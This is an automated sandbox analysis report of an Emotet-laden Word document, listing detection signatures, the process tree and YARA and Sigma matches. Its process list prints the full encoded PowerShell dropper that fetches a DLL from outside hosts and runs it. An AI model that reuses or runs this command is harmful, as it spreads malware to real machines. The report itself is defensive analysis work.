Loading ...

Play interactive tourEdit tour

Analysis Report 68254_2001.doc

Overview

General Information

Sample Name:68254_2001.doc
Analysis ID:345226
MD5:72a3bbd36a5aa4c5249d1ec4766369b8
SHA1:68e23b96d389bd088e3c377555e5e88e239b536d
SHA256:8c425fd958630a27d8ad158e21c4fc627c6b594931da974faf655707d6e06ea2

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document has an unknown application name
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2412 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnACcAKwAnAGUAZAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAGMAJwArACcAZwBpACcAKwAnAC0AYgBpAG4ALwBRACcAKQArACgAJwBnACcAKwAnAC8AQAAnACkAKwAoACcAcwAnACsAJwBnACAAJwApACsAJwB5AHcAJwArACgAJwAgAGEAaABzADoAJwArACcALwAnACkAKwAoACcALwB0AGgAZQBvACcAKwAnAC4AJwApACsAJwBkACcAKwAoACcAaQBnACcAKwAnAGkAJwApACsAKAAnAHQAYQBsACcAKwAnAC8AdwAnACkAKwAoACcAcAAnACsAJwAtAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwAnACsAJwBaAHkAbAAnACkAKwAnADIAJwArACgAJwAvAEAAJwArACcAcwAnACkAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaAAnACsAJwBzADoAJwArACcALwAvAHUAJwApACsAJwBtAG0AJwArACcAYQBoACcAKwAnAHMAJwArACgAJwB0AGEAJwArACcAcgBzAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwBhACcAKwAnAHAAcAAnACsAJwBfACcAKwAnAG8AbAAnACsAJwBkACcAKwAnAF8AbQAnACsAJwBhACcAKwAoACcAeQBfACcAKwAnADIAJwApACsAJwAwACcAKwAnADEAOAAnACsAJwAvAGEAJwArACgAJwBzAHMAZQB0ACcAKwAnAHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAB4AC8AQABzAGcAJwArACcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQBoAHMAOgAvACcAKQArACcALwB3ACcAKwAnAHcAJwArACgAJwB3AC4AdAAnACsAJwBlAGUAJwApACsAKAAnAGwAZQAnACsAJwBrAGQAZQBkACcAKQArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AYwAnACkAKwAoACcAZwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuACcAKwAnAC8ATAAnACkAKwAoACcAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAFAAbABhAEMARQAiACgAKAAoACcAcwBnACcAKwAnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAcwBlACcAKwAnAHcAJwApACsAJwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQAnACsAJwBlAGYAJwApACsAJwBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAEkAVAAiACgAJABRADAANABQACAAKwAgACQAQgBiADIAdQAyAGMAOQAgACsAIAAkAEUANgAyAFgAKQA7ACQARwA3ADQAWAA9ACgAKAAnAEMAOAAnACsAJwAzACcAKQArACcARAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAegB2ADMAMgBkADIAIABpAG4AIAAkAE4AcwB6AG8AOABpADEAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAJwArACcAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAFMAeQBzAFQARQBNAC4AbgBlAHQALgB3AGUAQgBDAEwASQBlAG4AdAApAC4AIgBEAG8AYAB3AGAATgBsAG8AYABBAEQARgBJAEwARQAiACgAJABWAHoAdgAzADIAZAAyACwAIAAkAFIAZAB0AGEAbAA0AHYAKQA7ACQAWAA2AF8AVQA9ACgAJwBBACcAKwAoACcANAAxACcAKwAnAEUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAUgBkAHQAYQBsADQAdgApAC4AIgBsAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADQAMwAxADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABSAGQAdABhAGwANAB2ACwAKAAoACcAQQBuAHkAUwAnACsAJwB0AHIAJwApACsAJwBpACcAKwAnAG4AZwAnACkALgAiAFQATwBgAFMAVAByAGAASQBuAGcAIgAoACkAOwAkAEYAMgBfAFkAPQAoACcAQwAnACsAKAAnADAAJwArACcAMwBWACcAKQApADsAYgByAGUAYQBrADsAJABLADgAOQBaAD0AKAAnAEcAMwAnACsAJwA2AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADAAMABLAD0AKAAnAFgAJwArACgAJwA2ADUAJwArACcASAAnACkAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 1776 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2484 cmdline: powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnACcAKwAnAGUAZAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAGMAJwArACcAZwBpACcAKwAnAC0AYgBpAG4ALwBRACcAKQArACgAJwBnACcAKwAnAC8AQAAnACkAKwAoACcAcwAnACsAJwBnACAAJwApACsAJwB5AHcAJwArACgAJwAgAGEAaABzADoAJwArACcALwAnACkAKwAoACcALwB0AGgAZQBvACcAKwAnAC4AJwApACsAJwBkACcAKwAoACcAaQBnACcAKwAnAGkAJwApACsAKAAnAHQAYQBsACcAKwAnAC8AdwAnACkAKwAoACcAcAAnACsAJwAtAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwAnACsAJwBaAHkAbAAnACkAKwAnADIAJwArACgAJwAvAEAAJwArACcAcwAnACkAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaAAnACsAJwBzADoAJwArACcALwAvAHUAJwApACsAJwBtAG0AJwArACcAYQBoACcAKwAnAHMAJwArACgAJwB0AGEAJwArACcAcgBzAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwBhACcAKwAnAHAAcAAnACsAJwBfACcAKwAnAG8AbAAnACsAJwBkACcAKwAnAF8AbQAnACsAJwBhACcAKwAoACcAeQBfACcAKwAnADIAJwApACsAJwAwACcAKwAnADEAOAAnACsAJwAvAGEAJwArACgAJwBzAHMAZQB0ACcAKwAnAHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAB4AC8AQABzAGcAJwArACcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQBoAHMAOgAvACcAKQArACcALwB3ACcAKwAnAHcAJwArACgAJwB3AC4AdAAnACsAJwBlAGUAJwApACsAKAAnAGwAZQAnACsAJwBrAGQAZQBkACcAKQArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AYwAnACkAKwAoACcAZwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuACcAKwAnAC8ATAAnACkAKwAoACcAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAFAAbABhAEMARQAiACgAKAAoACcAcwBnACcAKwAnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAcwBlACcAKwAnAHcAJwApACsAJwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQAnACsAJwBlAGYAJwApACsAJwBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAEkAVAAiACgAJABRADAANABQACAAKwAgACQAQgBiADIAdQAyAGMAOQAgACsAIAAkAEUANgAyAFgAKQA7ACQARwA3ADQAWAA9ACgAKAAnAEMAOAAnACsAJwAzACcAKQArACcARAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAegB2ADMAMgBkADIAIABpAG4AIAAkAE4AcwB6AG8AOABpADEAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAJwArACcAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAFMAeQBzAFQARQBNAC4AbgBlAHQALgB3AGUAQgBDAEwASQBlAG4AdAApAC4AIgBEAG8AYAB3AGAATgBsAG8AYABBAEQARgBJAEwARQAiACgAJABWAHoAdgAzADIAZAAyACwAIAAkAFIAZAB0AGEAbAA0AHYAKQA7ACQAWAA2AF8AVQA9ACgAJwBBACcAKwAoACcANAAxACcAKwAnAEUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAUgBkAHQAYQBsADQAdgApAC4AIgBsAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADQAMwAxADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABSAGQAdABhAGwANAB2ACwAKAAoACcAQQBuAHkAUwAnACsAJwB0AHIAJwApACsAJwBpACcAKwAnAG4AZwAnACkALgAiAFQATwBgAFMAVAByAGAASQBuAGcAIgAoACkAOwAkAEYAMgBfAFkAPQAoACcAQwAnACsAKAAnADAAJwArACcAMwBWACcAKQApADsAYgByAGUAYQBrADsAJABLADgAOQBaAD0AKAAnAEcAMwAnACsAJwA2AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADAAMABLAD0AKAAnAFgAJwArACgAJwA2ADUAJwArACcASAAnACkAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2748 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2756 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2680 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',EFdBQhtlp MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2460 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1324 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',EsaISiHxs MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2344 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2124049424.0000000000200000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000008.00000002.2135634388.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000C.00000002.2345582268.00000000001C0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000A.00000002.2161670466.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000B.00000002.2168147039.00000000001E0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.1e0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              7.2.rundll32.exe.10000000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                10.2.rundll32.exe.10000000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  8.2.rundll32.exe.10000000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    10.2.rundll32.exe.250000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 31 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2756, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll',#1, ProcessId: 2680
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAG